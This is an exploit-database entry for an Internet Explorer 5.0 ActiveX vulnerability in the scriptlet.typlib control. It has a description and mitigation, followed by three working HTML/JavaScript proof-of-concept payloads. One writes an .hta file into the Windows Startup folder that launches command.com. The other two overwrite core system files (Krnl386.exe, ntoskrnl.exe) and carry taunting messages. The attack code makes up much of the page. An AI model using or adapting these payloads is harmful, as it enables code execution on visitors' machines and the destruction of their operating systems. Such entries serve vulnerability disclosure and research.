Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 ActiveX 'Object for constructing type libraries for scriptlets' Vulnerability

vendor:

Internet Explorer

by:

Georgi Guninski, Seth Georgion

7.5

CVSS

HIGH

ActiveX Control Vulnerability

CWE

Product Name: Internet Explorer

Affected Version From: Microsoft Internet Explorer 5.0

Affected Version To: Microsoft Internet Explorer 5.0

Patch Exists: YES

Related CWE: N/A

CPE: a:microsoft:internet_explorer:5.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 95/Windows 98/Windows NT 4

2000

Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 ActiveX ‘Object for constructing type libraries for scriptlets’ Vulnerability

The 'scriptlet.typlib' ActiveX control can create, edit, and overwrite files on the local disk. This means that an executable text file (e.g. a '.hta' file) can be written to the startup folder of a remote machine and will be executed the next time that machine reboots. Attackers can exploit this vulnerability via a malicious web page or an email message.

Mitigation:

Disable ActiveX controls in the browser settings, use a firewall to block malicious webpages, and use an antivirus to detect malicious emails.

Source

Exploit-DB raw data:

Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 ActiveX "Object for constructing type libraries for scriptlets" Vulnerability

source: https://www.securityfocus.com/bid/598/info

The 'scriptlet.typlib' ActiveX control can create, edit, and overwrite files on the local disk. This means that an executable text file (e.g. a '.hta' file) can be written to the startup folder of a remote machine and will be executed the next time that machine reboots. Attackers can exploit this vulnerability via a malicious web page or an email message. 

Exploit by Georgi Guninski.
A working demo is available at:
http://www.nat.bg/~joro/scrtlb.html

<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski
http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>

Exploit by Seth Georgion
A working demo is available at: http://www.sassproductions.com/hacked.htm

Windows 98:
<p>
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14"
height="14"
></object><script>
scr.Reset();
scr.Path="C:\\windows\\system\\Krnl386.exe";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>
</p>

Windows NT:
<p>
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
width="14" height="14">
</object>
<script>
scr.Reset();
scr.Path="C:\\WINNT\\System32\\ntoskrnl.exe";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>
</p>